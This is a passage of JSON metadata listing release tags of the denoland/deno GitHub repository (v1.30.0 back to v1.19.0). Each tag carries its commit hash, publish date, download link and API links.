s/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/m